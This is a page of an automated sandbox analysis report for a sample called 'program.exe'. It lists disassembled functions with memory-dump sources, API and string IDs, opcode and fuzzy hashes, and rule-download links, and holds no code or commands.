                                                                                                                                                                                                                                  • API String ID: 1956198572-0
                                                                                                                                                                                                                                  • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                  • Instruction ID: b2b7638f0be3dba353e948db6fc7c658ebe20f7f021b8a8a3537daf0698cbfa2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0211E931A0C14242F656A769ED4927A9353FFA47E0FD44030DB4907B8DCD2DD4D58A10
                                                                                                                                                                                                                                  Function 00007FF72C65D010 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2933794660-0
                                                                                                                                                                                                                                  • Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                  • Instruction ID: 9497ebfe237829fba5ad6f0ae8ddd71a8962e52b33c5ec32f40ebd45b48d8dda
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7114C36B14B068AEB009F60EC452B973A4FB69768F840E31DA2D467A4DF78D1688750
                                                                                                                                                                                                                                  Function 00007FFBA43D3F4C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949877226.00007FFBA43D1000.00000040.00000001.01000000.00000018.sdmp, Offset: 00007FFBA43D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949827954.00007FFBA43D0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949877226.00007FFBA43DD000.00000040.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949877226.00007FFBA43E0000.00000040.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950013415.00007FFBA43E1000.00000080.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950056718.00007FFBA43E3000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba43d0000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2933794660-0
                                                                                                                                                                                                                                  • Opcode ID: 7ff4e97938adc5bb38bfeebc5981b68ed2a321e3e8e63433a9fab580c5a2b058
                                                                                                                                                                                                                                  • Instruction ID: f518955ae72c6ab89e49c4b79d5acea7d3f238b609f02cb841fb182f2bc5b34a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7ff4e97938adc5bb38bfeebc5981b68ed2a321e3e8e63433a9fab580c5a2b058
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC111862B19F05CAEB00CB71E8942A833A4FB19758F440E35DE6D467A4EF78D1688340
                                                                                                                                                                                                                                  Function 00007FFBA610ECE0 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1950129246.00007FFBA6091000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFBA6090000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950095632.00007FFBA6090000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6113000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6115000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA613D000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6148000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6153000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950432020.00007FFBA6157000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950478595.00007FFBA6159000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba6090000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2933794660-0
                                                                                                                                                                                                                                  • Opcode ID: c228ff487a8229492adc3f8944b6875e240ddca761839ed72b11deef452fc955
                                                                                                                                                                                                                                  • Instruction ID: 3948a9ecd487428d1dc761b303fba05cb05d0b0ccdd0f8fcb044c447a9a2b7cc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c228ff487a8229492adc3f8944b6875e240ddca761839ed72b11deef452fc955
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D114FB2B56F0189EB019B70E8492B837A4F719B58F041E31DE6D87754EF38D1548340
                                                                                                                                                                                                                                  Function 00007FFBAA492EDC Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2933794660-0
                                                                                                                                                                                                                                  • Opcode ID: 8abdb046c2d483d6713d37fa3c95cfe7202fcb201bb2e424a1ff1cb05108d538
                                                                                                                                                                                                                                  • Instruction ID: eed6ff04755a3c7c0372ff94cdf4b3da5dd5ebc7afe37ba4d543e9d3f9a3f67c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8abdb046c2d483d6713d37fa3c95cfe7202fcb201bb2e424a1ff1cb05108d538
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FD114C66B15B01CAEB008B71E8842A833A8F758758F040A31EE2D42BA8DF38D1658350
                                                                                                                                                                                                                                  Function 00007FFBA4172E0C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949490443.00007FFBA4171000.00000040.00000001.01000000.0000001A.sdmp, Offset: 00007FFBA4170000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949454231.00007FFBA4170000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949490443.00007FFBA41BA000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949490443.00007FFBA41C8000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949490443.00007FFBA4217000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949490443.00007FFBA421C000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949490443.00007FFBA421F000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949749489.00007FFBA4220000.00000080.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949783531.00007FFBA4222000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba4170000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2933794660-0
                                                                                                                                                                                                                                  • Opcode ID: 1143ce772416530538e6e632f3059b38426edc2ca8d0a1c1cafe6258f8b28d68
                                                                                                                                                                                                                                  • Instruction ID: f5dd40be4297de1d97f205bfc5926cac64a1ba6578a719c8eb84262dc5da65fe
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1143ce772416530538e6e632f3059b38426edc2ca8d0a1c1cafe6258f8b28d68
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5D113662B16B018AEB01DF70E8852A833A4FB19768F440A31DE2D827A8DF78D1588640
                                                                                                                                                                                                                                  Function 00007FFBA66A2F60 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1951835790.00007FFBA66A1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFBA66A0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951780580.00007FFBA66A0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66AE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66C1000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66CA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66CE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952036399.00007FFBA66D1000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952071427.00007FFBA66D3000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba66a0000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2933794660-0
                                                                                                                                                                                                                                  • Opcode ID: 76cc7d293dce52ac903e1c4f27db05cd87f84480e9050da05d46ae017720b8e1
                                                                                                                                                                                                                                  • Instruction ID: 36c23c7b8bcb1cff61816c579b65caa9009a0693aa33d534a412d4a96bbe3b8c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 76cc7d293dce52ac903e1c4f27db05cd87f84480e9050da05d46ae017720b8e1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6D114CA2B15F058AEB008F74EC542A933B4FB18B58F441E31DE2D827A4DF38D1648780
                                                                                                                                                                                                                                  Function 00007FFBA6091A05 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 283COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1950129246.00007FFBA6091000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFBA6090000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950095632.00007FFBA6090000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6113000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6115000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA613D000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6148000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6153000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950432020.00007FFBA6157000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950478595.00007FFBA6159000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba6090000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: 00007
                                                                                                                                                                                                                                  • String ID: ..\s\ssl\ssl_asn1.c$d2i_SSL_SESSION
                                                                                                                                                                                                                                  • API String ID: 3568877910-384499812
                                                                                                                                                                                                                                  • Opcode ID: 2a5271567f02ba352d921ff3c4e2fac1e9ecca7785b90009fd4beffc7ef3d7b0
                                                                                                                                                                                                                                  • Instruction ID: de036be105624f6a1e98497106aa70c55ef8b1061909f1d919d65ea9891a066f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2a5271567f02ba352d921ff3c4e2fac1e9ecca7785b90009fd4beffc7ef3d7b0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A7D16BF2A0AB4696EB66DF35D5802B827A6FB54F84F444036CE1D87795DF38E4A0C310
                                                                                                                                                                                                                                  Function 00007FFBA6091EBF Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 140COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1950129246.00007FFBA6091000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFBA6090000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950095632.00007FFBA6090000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6113000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6115000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA613D000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6148000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6153000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950432020.00007FFBA6157000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950478595.00007FFBA6159000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba6090000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: 00007F6570
                                                                                                                                                                                                                                  • String ID: ..\s\ssl\d1_srtp.c$ssl_ctx_make_profiles
                                                                                                                                                                                                                                  • API String ID: 118773457-118859582
                                                                                                                                                                                                                                  • Opcode ID: e76ec92c1eceef7b0bbcb8077533a9e54e2e53dd7fd2383ad3f477ea5b2b501f
                                                                                                                                                                                                                                  • Instruction ID: b198d296806eee789a9e2e13a784fbb1faf426d7a6dccdc1fe33ec374097a710
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e76ec92c1eceef7b0bbcb8077533a9e54e2e53dd7fd2383ad3f477ea5b2b501f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7451ADE2F0E64256FA239B31E8453BD5697AF85F84F595431DE0D4BB92DE3CE8928300
                                                                                                                                                                                                                                  Function 00007FF72C675B1C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID: ?
                                                                                                                                                                                                                                  • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                  • Opcode ID: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
                                                                                                                                                                                                                                  • Instruction ID: 2c8d51917cfdedeef6d7a7d46cd1ee7869b08b06d17c0088ae84c53382110e74
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B1414912A0838242FB22AB259C52379E762FBA0BB4F944679EE5C07AD5DF3CD445CF10
                                                                                                                                                                                                                                  Function 00007FF72C669014 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 00007FF72C669046
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C66A948: HeapFree.KERNEL32(?,?,?,00007FF72C672D22,?,?,?,00007FF72C672D5F,?,?,00000000,00007FF72C673225,?,?,?,00007FF72C673157), ref: 00007FF72C66A95E
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C66A948: GetLastError.KERNEL32(?,?,?,00007FF72C672D22,?,?,?,00007FF72C672D5F,?,?,00000000,00007FF72C673225,?,?,?,00007FF72C673157), ref: 00007FF72C66A968
                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF72C65CBA5), ref: 00007FF72C669064
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID: C:\Users\user\AppData\Roaming\program.exe
                                                                                                                                                                                                                                  • API String ID: 3580290477-4122129678
                                                                                                                                                                                                                                  • Opcode ID: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
                                                                                                                                                                                                                                  • Instruction ID: f4feaf36a7a1201411cbf3947db74d7d10bf82483e76da0c7c89f30fbfe82c50
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB417031A0860285EB1AAF219D401BCB3A6FF547A4BA54039ED4E47B85DE3DD481CB60
                                                                                                                                                                                                                                  Function 00007FF72C66CC38 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                  • String ID: U
                                                                                                                                                                                                                                  • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                  • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                  • Instruction ID: 7c5b059ea10da6695cd57e5382a94c849e9edd373851d585ba448e8953ba70c0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AD41E532718E8191DB219F25E8443A9B7A2FBA87A4F904135EE4D87788EF3CD401CB60
                                                                                                                                                                                                                                  Function 00007FFBA43D3420 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 93COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949877226.00007FFBA43D1000.00000040.00000001.01000000.00000018.sdmp, Offset: 00007FFBA43D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949827954.00007FFBA43D0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949877226.00007FFBA43DD000.00000040.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949877226.00007FFBA43E0000.00000040.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950013415.00007FFBA43E1000.00000080.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950056718.00007FFBA43E3000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba43d0000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: 00007F6570
                                                                                                                                                                                                                                  • String ID: _constructors$openssl_
                                                                                                                                                                                                                                  • API String ID: 118773457-3359357282
                                                                                                                                                                                                                                  • Opcode ID: 117008ba4b5f8ca73d77553d2b2e8d4ddd83506b125ec0b6d7a7d7bf61da898d
                                                                                                                                                                                                                                  • Instruction ID: c80ce811392c308ebd37866dcf9433f7e70a4bbdc64e0658733aba577d957777
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 117008ba4b5f8ca73d77553d2b2e8d4ddd83506b125ec0b6d7a7d7bf61da898d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F531C7A1A0AF02C2EE168B76E9D423827E5AF49F91F144875CE5D027B5EF3CE9558700
                                                                                                                                                                                                                                  Function 00007FFBA43D59E4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949877226.00007FFBA43D1000.00000040.00000001.01000000.00000018.sdmp, Offset: 00007FFBA43D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949827954.00007FFBA43D0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949877226.00007FFBA43DD000.00000040.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949877226.00007FFBA43E0000.00000040.00000001.01000000.00000018.sdmpDownload File
